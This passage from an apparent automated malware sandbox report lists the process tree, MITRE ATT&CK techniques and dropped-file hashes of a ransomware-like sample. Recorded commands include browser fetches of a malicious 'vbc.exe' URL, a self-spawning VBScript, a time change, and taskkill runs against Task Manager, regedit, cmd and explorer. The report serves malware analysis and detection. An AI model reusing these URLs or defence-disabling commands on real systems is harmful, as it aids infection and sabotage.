      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:992
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:992 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3236
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2608
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3228
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:2904
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3192
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2060
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2060 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3244
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1552
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1552 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3284
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2480
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1960
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3392
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      PID:3652
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3652 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:2052
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        5⤵
        
        PID:760
      - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        6⤵
        
        PID:1064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        7⤵
        
        PID:3300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        8⤵
        
        PID:3632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        9⤵
        
        PID:3716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        10⤵
        
        PID:3868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        11⤵
        
        PID:3956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        12⤵
        
        PID:4024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        13⤵
        
        PID:3220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        14⤵
        
        PID:3764
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        15⤵
        
        PID:3816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        16⤵
        
        PID:1056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        17⤵
        
        PID:1300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        18⤵
        
        PID:2776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        19⤵
        
        PID:3896
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        20⤵
        
        PID:3160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        21⤵
        
        PID:1416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        22⤵
        
        PID:3204
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        23⤵
        
        PID:2464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        24⤵
        
        PID:4256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        25⤵
        
        PID:4384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        26⤵
        
        PID:4628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        27⤵
        
        PID:4760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        28⤵
        
        PID:4876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        29⤵
        
        PID:4968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        30⤵
        
        PID:4220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        31⤵
        
        PID:4084
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        32⤵
        
        PID:4964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c time 00:00
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\wins32bugfix.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3044
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3844
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:4056
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:1648
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:4204
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:4160
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:4308
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\AssertMount.edrwx.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:4236

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2780

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2676

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:2840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1EE2A8B033EB8C8D30746A1B3BD4E662

Filesize
504B

MD5
b604ae70f5b032f6c8264748a3da7bfc

SHA1
37eb2cbe2e2c6383215abb0ffc95e4cc108803a8

SHA256
f2a05a74357f76c06985cc6504b1673d27a7b22546104cb450ce7e7cbc95f71e

SHA512
67bbf34e2b2b8113bf99259efeabc09e10348eb100916a43bf4207ccabe5e16c61bfa928df34bbd09a755dc340e72a9a9282ec289c2182238db8d7981022add1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
53373fc482dbe858ce47866583cb9d74

SHA1
2d9379503e519599d2d0bfbfd2f39108f5baf196

SHA256
a76dbb249261213c36503eded4f90a9cc64ea617584a8611ffd697bc52df0027

SHA512
09b74d3cb5d8ed71525aaaeb8456c96b4aaf1ee3f33367849ed9dd28d30f10172a14ce64d55585923c5f381c9de331fd3cca83f79ef444750d3704d1a56e3322

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35DDEDF268117918D1D277A171D8DF7B_35F8500DD4A291FDDC2DA5DB7F867071

Filesize
471B

MD5
496ede12b627100b7e5665d26b2e8235

SHA1
f448eeaa998146e93a3afebd14ad959726695d25

SHA256
c4fae79f35d5a521b28629f4d29e9c1ea5828bd04b117e7898f0fab7407e9878

SHA512
b1b686dd4c8bb14689fadc678ea34d6605a4fa63ba1f924c656c1e282cf7c7372ffd056c7ea6d63431465dcefa7ff5416b2c9fb25ff7e863ca7c147e4da5f30f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7

Filesize
472B

MD5
ff53df46ca9a9a54467be94bf541fcf0

SHA1
643b9b8dcd64b0fd6c2a961fb2cfc7beae491ca8

SHA256
0233d19bcb2ce770bfcfeb2e26ddfa67375e78a65e810172b048b0e5b2391826

SHA512
9c120c163800e6190b2fdfa705b85b27cdb989f0e195da7e95d2a83796a88076aadfa9996192515c9bbe08a2cd83713612d964c26e0c2973d1f0f4a6e1c55704

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Filesize
471B

MD5
510ccfc12588a44590e56dab8601fb31

SHA1
c2e19eac78ee021c52fa6c83ff10294281c063b6

SHA256
18476c50d9910d02ab8e444a3df2997bb33e792a6eebd5b9383bfc96feb06041

SHA512
00ba7bb242ec75da2fa50ae4f612de50bd715123c6bb2444967a318062b5ca9a3654e8d784b5f2dfe8a51ba8f3666e7100a99e1cfde3ab1ecbed51a954be8f54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
170B

MD5
0a7084050dd2db55d6479eb405a32a6a

SHA1
096c85906d1879c8b8dbd149c1a2acfdcdaaada0

SHA256
2b05205d5bcf03aa99ad0b248bdb5adbcdc0d6ab74789d65c38690aedfeb6751

SHA512
8683dbffca1ef1e3f1e244349b627b58383d276a995de355ac192236a911753582d2b61a257b47012c5617138ffc16e3c02026e31e3b73d25af62bd123211cf0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
c464090287a0d70fe8f028c9dcbadef9

SHA1
726147ca83f7b65b4d529bed36331127c205fb54

SHA256
8a4546b5dabc01b4b9c49735c3e450b380e392536b7e70ece881a5b88f4f31b3

SHA512
6ef74053644befdae1f1b82d1d58e617b0d7f4ee9e276682b97eb3d8989ec284a59d91ab10a40d804777eaf61034003bfb6fe3c98a9563fc646d021efbff0ecd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1EE2A8B033EB8C8D30746A1B3BD4E662

Filesize
550B

MD5
249267545b8fd4db7f838f215599a330

SHA1
09daf9ef5c49244265ecf6f65c2c2a9697f11d82

SHA256
e1ee22a07557c588e20df3dc8a0c40e3ac46530eb5ea61e26a2f578378c9e7e7

SHA512
70570bd3d70e336d083c8d82ed64c47635c2d826c6d2e5ba27934125548104803ff1b18b83299a1d35fd871024a9dce979fcc6c96d51182b6695db8c33edd88d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
05355777825ebc90be00739a331fb46c

SHA1
98b044ee77293849b2142967f1eed6dae45c6a0d

SHA256
45d3a4679f6ce41383cb155f73b388830c4344029be63a4988b52acbacafe59c

SHA512
f967cd2ab76bd50b03a83f656d3fcef004954c35631e4767d026fd06ccfa52f9649d6c70fff4b44be532558010a1f04c9daaa76e4b3ec4dfe00b2c51e931f762

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171D8DF7B_35F8500DD4A291FDDC2DA5DB7F867071

Filesize
408B

MD5
d56ad61280da45a77e276db69df00591

SHA1
68f2a13e3269785d026d63c89805546e075572d9

SHA256
32832d53d13dd8f7574a8e64c1f4cba8e283a62960166ef082763c743ff3aa0c

SHA512
78e47438fd1c6d03046a0dd1930f871d4929177b9a3ba694366022f20a6b5dc66f57d6854b02555c23202860da3892f10af4b7dabedfdfff1081d955bdd9a8ba

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
850058dbb7743c1cdc8dbb3309dabc1b

SHA1
f027be63163b0aef63baf981b19c334b560b3fea

SHA256
38d23c76bec4d3c05c4c7774741fd99132da1e5298416d02b9a801334be9cb1c

SHA512
fbb4f46216e08656cb013410c49848766b63178777a7d258f1dd2d9ed83966fb6dc0d21428fa9da80408a30b72df7c3869c73c904937092d010fb482ec7db5dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
84f056a8b292dcf19dc7a5571848de3d

SHA1
0fea464c239ac76b2d9dfce427e7baccbebe8131

SHA256
37e3cbf67cfbb036c9a95a9208d87b437c21326c0197d46fb2fe9113ac245233

SHA512
6e4928f5854f4ef670f7b82ab60108b3d236c6f3d722f14f54aea5f76960e480bc54a7cd1190874f10b79da376a248c9ce09871cbc8b2a88f1b70ca9170a888c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c00c47d5f1416e5ccad1cda2d69248ed

SHA1
b87b8e85a71454a9a7af95ee8c8289133c736e8e

SHA256
86d1305fe2053900f566a7da7ade7c15d8cd6c7697cbe879ced44a86ce72abb8

SHA512
35942ea8f2933e3c4f2d4c3d8bb57b8adbc533d0f726d604e34a3af87f877437c39c7a7321e3a81508ed64f57303d086929a47ae4a0b9bf9216cbde4b475b0c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7

Filesize
398B

MD5
8c0534e02824fd15838976a5af707ca2

SHA1
8a8a5bcf404ba26f06de485b2b5cb4467ed3ec84

SHA256
298cfbac3d7559eef34f71cb58250a86e06b135a264515a38c7c4bae33a2c2c7

SHA512
b4ebf1778b742d146018f4bd482f13f2939162255cb1d6cb63a11f13dec6fed597a57bb7ddb86b01340ba2775fb61555712abd1e04959d6ea93a48e0066f3800

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Filesize
396B

MD5
56ace8729611b295da740df01223ad16

SHA1
60d1d0e0e0539a3cc96b2e646765cf059564c45f

SHA256
d10b2d23013397ee95e66d5def31696d085913d714c27e733c3b3ac713c1f259

SHA512
7cc7f481c624fab35e6992580033e8708ea39db6b202f2f9395a1ef8ed896510f786f9443380b74283835ad18e279414aea41663aa7d7e84e79f32c103844e88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{36BF0421-9762-11EF-A094-FE6EB537C9A6}.dat

Filesize
5KB

MD5
0235b224d3b6aa0dfe8e9c28e376e6b7

SHA1
e4c4be6c48efffeb14a3e9d214c64af51425a656

SHA256
85b4e15221eff443291eddbe5e775d8ada103db93e2dc64452810138543532c2

SHA512
ae7d912db9bdd540d72ed72a3d9e164645142dce44ebb5ff9d55255ce1c05f7beb8ba7dd1d86edebc0708d03f391a069bc2f838801dfeebeccfaebc89ea4fc59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{36D47081-9762-11EF-A094-FE6EB537C9A6}.dat

Filesize
5KB

MD5
244b5b03c16a2e80b77e14f20fccb9a0

SHA1
9dcc8a410a16d9eb915deb6be633dd5c020a2d1b

SHA256
07eeb11e66d754b4bebbb602bdde13ffed016f82364190c9f4f7c0f108db41b0

SHA512
b458fc8fec76745c6bca78d117641b12fe06f07d2c9fb8cc85e42fc17a4faea7531171329243f6afc79fdbf840da60d2e488bbc40c18c91a02fb119e32b50826

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{36D6D1E1-9762-11EF-A094-FE6EB537C9A6}.dat

Filesize
5KB

MD5
9b6787b4c2ebcfb632cbbdd2b56bdb04

SHA1
402e2ced800936c83bede13c2c0fab610e546621

SHA256
38ed143348eb5feb90071666f16d9bbde195fee5ecc77c9e0749f285b2c5741f

SHA512
9b3eea354ce7358476a958ba32180c9e3f76f29d5ce8762c64cf3ec3ae87cb7604bf3ea7e0efaedd124b04312af3ed61a1e4fc87cef762594803849280210091

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{36E233F1-9762-11EF-A094-FE6EB537C9A6}.dat

Filesize
5KB

MD5
a7160f570c4858f9f158aeae84e71760

SHA1
033f7c3a9f357fb01a703b5bc9c8cf99ec6579f1

SHA256
10484591d2ab770c852907856b68c8fd9699fdbb6ae1911c6c707c054274450f

SHA512
5ef81ea01863d35529bd009b151e534173b3e93d28a6f0ef4c7e8da47a9d2f7f95c4a6d4c0e091d459c31e6f1d3224ad95761551b58f7bbbcf15c8291b49305a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{37244601-9762-11EF-A094-FE6EB537C9A6}.dat

Filesize
4KB

MD5
07e3b5d4306a203d4876c40ebc53ec9e

SHA1
f57871f47e391b36405c52fe1540dfa31574d4d7

SHA256
5b24246a7de11c54e91067fb3d8cdeae2f1e29ff59837c73b364e444c3d8af0a

SHA512
6db4c4be3e93c5c2c1193e44013ee48b3406bd66084d84b3c770cd622e4a75c6d80d022689f8b40ee148315c1e689102e4db04051fef3e9525143256b52b541c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{372DCB81-9762-11EF-A094-FE6EB537C9A6}.dat

Filesize
4KB

MD5
be468e0fcb7122100b68543a2e0c324e

SHA1
46fab481e4c97c49929bc0a743f836c54d64f510

SHA256
804c50201beab0d72667be34c9e98363996c682e2709bd5e1c0617e9115aa649

SHA512
b29c9f3b9ab58fbc046cc23d70af061a43b0c873d1e564fecf22e46a858a726e8b32d298eed8f6d7a4885ab6adb2bfdf1c0ed38878dd069e003c32ca1696a24e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\3a8e55c6-b1f3-4659-99eb-125ae72bd084[1].htm

Filesize
167B

MD5
0104c301c5e02bd6148b8703d19b3a73

SHA1
7436e0b4b1f8c222c38069890b75fa2baf9ca620

SHA256
446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f

SHA512
84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE14C.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE17E.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2AQ28JKJ.txt

Filesize
228B

MD5
3e68d02a85449e2191d704a806a3a8f9

SHA1
920a165c11e7b0dbb715f4d6f645d9844911f5d9

SHA256
8b3d5149f6f6042102ccb360b542a178fdea639908a896b9285cc1fbdf259b67

SHA512
1390785e304a590fb377f125beada74136d2914457a96f2927508d0ed0d3856020c5b27c1b33dde0f673d747a91166517af57a6bc4f772f0792f28e8b04fd412

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\929X69WQ.txt

Filesize
228B

MD5
74ad26ce7ef6b5061abd72dbb1410f16

SHA1
f381f6de97877965aeb92d0aaae911fefc62185c

SHA256
0d78fd8a3ea259d7660e157cfccff8cd850bb32febd0f9223096f8985343c6af

SHA512
64b6e20b5cb467b9626345e735cb8bea0402969ed7ebdb75f4d67e1210e21083fd06ce116acf01e760f7da2f012c1ae89a10aa6fc5b69d5ec5ddfdc2a5a46b62

Download Submit
C:\Users\Admin\Desktop\AssertMount.edrwx.lcryx

Filesize
266KB

MD5
69fa36fce1257f508db87159909556cf

SHA1
582ec993324ef96ca5df9260d830567e932d04fe

SHA256
68af8931d4ce5e383c3f19f0ef7935d3e1fa39b0e7c98905d5e35b7ef408ef0b

SHA512
a3241b4ab2d762ac5288f5e79bb2c05e46d8b9026e8848492619c85e0cf5329d3542eb7a6688b3e4eac35c73f2082ac1532b2a24eed49b415c9c0c1791fe96d4

Download Submit
C:\Users\Admin\Desktop\READMEPLEASE.txt

Filesize
263B

MD5
3ef0278e79a3b141585b0eb66d965dcd

SHA1
2c5a34b067b368adcb8daad4b6ead6c4a1a2ef26

SHA256
defe7e5a9ae1aa925ca79cc6f7b1c56368bcf21b48668e1161449ed96bb6774a

SHA512
b21fcb3dfc37680fe6669818505101fff46a0848a5406e5e94c5dbe4c6031bb47cfe4763d21fa8d966c8e09e8e5050c4e35bc1f0cfdedcb6cb63bec9db34221c

Download Submit
C:\Windows\System32\haha.vbs

Filesize
1KB

MD5
f2a256e463d8b95880579574a96ed06e

SHA1
0148ad8f4a38a303fc58ff7bf543b9fd2da6cdad

SHA256
d8c9882db9ff81f39e227378a1476d27075b8aa63e3c7ac31ab79b35a1f63915

SHA512
3ac57af6f83ad83d63689c1f9868829cf83220d98b278da267ba4c8398fa541afff38416e1a947aff74963099fdf75c275cb302f3cea120eddd5afc6b9a8b5a1

Download Submit
C:\Windows\System32\iamthedoom.bat

Filesize
412B

MD5
e953d5386439260f927d0bcb1ed36b58

SHA1
a8c6f22d68309602cb1421fa07c152e16e0e64f7

SHA256
0d61eb415e84f8d6533558991ff07667ef685c4623de163482122a14612caaf8

SHA512
a39545ccadba90484004ee824e2e77d6abec16e37220e1e5f22e60a6069c56bc7d032cb91fab01816a44693202587e249d59419b410daa2ec1bdb229997df641

Download Submit
C:\Windows\System32\wins32bugfix.vbs

Filesize
496B

MD5
e2d836beba8f0d92022fc8c07d42f684

SHA1
ca8904c7281ff138afbbb2690862a54ebdbd53e7

SHA256
2581cbeb3f35d83a6f90ed208a1f3ac8e59efbbeafbaab11c9d2b66c2333e1a3

SHA512
ead612bde359a4d0d7b305f8aeaee4d46595c8cbfbfecd0ff76c7dbc1b0156e2a6d5df76787c2c07134df1d4d0122f2b61a51b3287c026ec1e202228f0248ad7

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads